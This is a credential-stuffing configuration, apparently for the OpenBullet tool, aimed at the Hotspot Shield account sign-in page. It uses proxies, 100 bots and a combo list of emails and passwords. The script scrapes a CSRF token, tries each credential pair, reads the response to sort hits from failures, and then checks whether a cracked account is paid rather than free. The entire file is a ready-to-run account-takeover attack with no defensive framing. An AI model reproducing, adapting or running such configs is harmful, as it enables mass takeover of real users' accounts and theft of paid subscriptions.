[SETTINGS]
{
  "Name": "hotspot shield",
  "SuggestedBots": 100,
  "LastModified": "2019-05-28T15:18:13.5985774-07:00",
  "AdditionalInfo": "",
  "Author": "Arbiter/Arbitrator/Adjudicator",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://account.hotspotshield.com/sign-in" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
PARSE "<SOURCE>" LR "vxsftok: '" "'" -> VAR "" "" "TOKEN" 
REQUEST POST "https://account.hotspotshield.com/sign-in" 
  CONTENT "login=<USER>&pwd=<PASS>&remember=0&ajax=true&vxsftok=<TOKEN>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://account.hotspotshield.com" 
  HEADER "referer: https://account.hotspotshield.com/sign-in" 
  HEADER "accept-language: en-US,en;q=0.9" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"result\":1,\"error\":null,\"debug\":null}" 
  KEYCHAIN Failure OR 
    KEY "{\"result\":0,\"error\":\"Please enter your username\",\"debug\":\"\"}" 
    KEY "The username and\/or password is incorrect" 
REQUEST POST "https://account.hotspotshield.com/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Free Membership" 
  KEYCHAIN Failure OR 
    KEY "Free Membership" 
